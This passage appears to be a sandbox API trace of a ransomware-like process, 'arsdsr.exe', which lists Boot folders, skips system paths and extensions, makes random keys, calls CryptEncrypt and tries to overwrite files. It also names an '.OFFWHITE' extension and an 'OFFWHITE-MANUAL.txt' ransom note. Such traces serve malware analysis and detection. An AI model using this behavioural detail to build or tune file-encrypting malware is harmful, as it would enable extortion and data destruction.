(lpString1="cs-CZ", lpString2="rsa") returned -1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="ntuser.dat") returned -1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="programdata") returned -1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="appdata") returned 1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="program files") returned -1 [0082.217] lstrcmpiW (lpString1="cs-CZ", lpString2="program files (x86)") returned -1 [0082.217] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.217] lstrcatW (in: lpString1="C:/Boot\\", lpString2="cs-CZ" | out: lpString1="C:/Boot\\cs-CZ") returned="C:/Boot\\cs-CZ" [0082.217] lstrcatW (in: lpString1="C:/Boot\\cs-CZ", lpString2="\\" | out: lpString1="C:/Boot\\cs-CZ\\") returned="C:/Boot\\cs-CZ\\" [0082.217] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\cs-CZ\\" | out: lpString1="C:/Boot\\cs-CZ\\") returned="C:/Boot\\cs-CZ\\" [0082.217] lstrcatW (in: lpString1="C:/Boot\\cs-CZ\\", lpString2="*.*" | out: lpString1="C:/Boot\\cs-CZ\\*.*") returned="C:/Boot\\cs-CZ\\*.*" [0082.217] FindFirstFileW (in: lpFileName="C:/Boot\\cs-CZ\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.218] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.218] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.218] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.218] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.218] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.218] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.218] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\cs-CZ\\" | out: lpString1="C:/Boot\\cs-CZ\\") returned="C:/Boot\\cs-CZ\\" [0082.218] lstrcatW (in: lpString1="C:/Boot\\cs-CZ\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:/Boot\\cs-CZ\\bootmgr.exe.mui" [0082.218] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.218] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.218] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.219] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.219] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.219] GetProcessHeap () returned 0x500000 [0082.219] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52be00 [0082.219] CreateFileW (lpFileName="C:/Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.223] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.223] GetProcessHeap () returned 0x500000 [0082.223] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a9a8 [0082.223] GetProcessHeap () returned 0x500000 [0082.223] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a990 [0082.223] GetProcessHeap () returned 0x500000 [0082.223] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x53b9f8 [0082.223] GetProcessHeap () returned 0x500000 [0082.223] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x536328 [0082.223] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.223] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.223] SystemFunction036 (in: RandomBuffer=0x52a9a8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a9a8) returned 1 [0082.223] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.223] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.223] SystemFunction036 (in: RandomBuffer=0x52a990, RandomBufferLength=0x10 | out: RandomBuffer=0x52a990) returned 1 [0082.223] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.223] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.223] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x53b9f8*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x53b9f8*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.224] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.224] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.224] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x536328*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x536328*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.224] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.224] SetLastError (dwErrCode=0x0) [0082.224] WriteFile (in: hFile=0xffffffff, lpBuffer=0x53b9f8, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.224] GetLastError () returned 0x6 [0082.224] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.224] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.224] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="da-DK", cAlternateFileName="")) returned 1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2=".") returned 1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="..") returned 1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="...") returned 1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="windows") returned -1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="$recycle.bin") returned 1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="rsa") returned -1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="ntuser.dat") returned -1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="programdata") returned -1 [0082.224] lstrcmpiW (lpString1="da-DK", lpString2="appdata") returned 1 [0082.225] lstrcmpiW (lpString1="da-DK", lpString2="program files") returned -1 [0082.225] lstrcmpiW (lpString1="da-DK", lpString2="program files (x86)") returned -1 [0082.225] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.225] lstrcatW (in: lpString1="C:/Boot\\", lpString2="da-DK" | out: lpString1="C:/Boot\\da-DK") returned="C:/Boot\\da-DK" [0082.225] lstrcatW (in: lpString1="C:/Boot\\da-DK", lpString2="\\" | out: lpString1="C:/Boot\\da-DK\\") returned="C:/Boot\\da-DK\\" [0082.225] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\da-DK\\" | out: lpString1="C:/Boot\\da-DK\\") returned="C:/Boot\\da-DK\\" [0082.225] lstrcatW (in: lpString1="C:/Boot\\da-DK\\", lpString2="*.*" | out: lpString1="C:/Boot\\da-DK\\*.*") returned="C:/Boot\\da-DK\\*.*" [0082.225] FindFirstFileW (in: lpFileName="C:/Boot\\da-DK\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.225] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.225] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.225] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.225] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.225] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.225] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.225] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.225] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.226] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.226] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\da-DK\\" | out: lpString1="C:/Boot\\da-DK\\") returned="C:/Boot\\da-DK\\" [0082.226] lstrcatW (in: lpString1="C:/Boot\\da-DK\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\da-DK\\bootmgr.exe.mui") returned="C:/Boot\\da-DK\\bootmgr.exe.mui" [0082.226] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.226] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.226] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.226] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.227] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.227] GetProcessHeap () returned 0x500000 [0082.227] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bdf0 [0082.227] CreateFileW (lpFileName="C:/Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.228] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.228] GetProcessHeap () returned 0x500000 [0082.228] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a9c0 [0082.228] GetProcessHeap () returned 0x500000 [0082.228] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a888 [0082.228] GetProcessHeap () returned 0x500000 [0082.228] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x534440 [0082.228] GetProcessHeap () returned 0x500000 [0082.228] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x52ca50 [0082.228] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.228] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.228] SystemFunction036 (in: RandomBuffer=0x52a9c0, RandomBufferLength=0x10 | out: RandomBuffer=0x52a9c0) returned 1 [0082.228] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.228] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.228] SystemFunction036 (in: RandomBuffer=0x52a888, RandomBufferLength=0x10 | out: RandomBuffer=0x52a888) returned 1 [0082.228] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.228] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.228] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x534440*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x534440*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.229] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.229] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.229] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x52ca50*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x52ca50*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.229] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.229] SetLastError (dwErrCode=0x0) [0082.229] WriteFile (in: hFile=0xffffffff, lpBuffer=0x534440, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.229] GetLastError () returned 0x6 [0082.229] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.229] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.229] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="de-DE", cAlternateFileName="")) returned 1 [0082.229] lstrcmpiW (lpString1="de-DE", lpString2=".") returned 1 [0082.229] lstrcmpiW (lpString1="de-DE", lpString2="..") returned 1 [0082.229] lstrcmpiW (lpString1="de-DE", lpString2="...") returned 1 [0082.229] lstrcmpiW (lpString1="de-DE", lpString2="windows") returned -1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="$recycle.bin") returned 1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="rsa") returned -1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="ntuser.dat") returned -1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="programdata") returned -1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="appdata") returned 1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="program files") returned -1 [0082.230] lstrcmpiW (lpString1="de-DE", lpString2="program files (x86)") returned -1 [0082.230] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.230] lstrcatW (in: lpString1="C:/Boot\\", lpString2="de-DE" | out: lpString1="C:/Boot\\de-DE") returned="C:/Boot\\de-DE" [0082.230] lstrcatW (in: lpString1="C:/Boot\\de-DE", lpString2="\\" | out: lpString1="C:/Boot\\de-DE\\") returned="C:/Boot\\de-DE\\" [0082.230] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\de-DE\\" | out: lpString1="C:/Boot\\de-DE\\") returned="C:/Boot\\de-DE\\" [0082.230] lstrcatW (in: lpString1="C:/Boot\\de-DE\\", lpString2="*.*" | out: lpString1="C:/Boot\\de-DE\\*.*") returned="C:/Boot\\de-DE\\*.*" [0082.230] FindFirstFileW (in: lpFileName="C:/Boot\\de-DE\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.231] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.231] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.231] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.231] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.231] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.231] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.231] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\de-DE\\" | out: lpString1="C:/Boot\\de-DE\\") returned="C:/Boot\\de-DE\\" [0082.231] lstrcatW (in: lpString1="C:/Boot\\de-DE\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\de-DE\\bootmgr.exe.mui") returned="C:/Boot\\de-DE\\bootmgr.exe.mui" [0082.232] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.232] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.232] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.232] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.232] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.232] GetProcessHeap () returned 0x500000 [0082.232] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bde0 [0082.232] CreateFileW (lpFileName="C:/Boot\\de-DE\\bootmgr.exe.mui" (normalized: 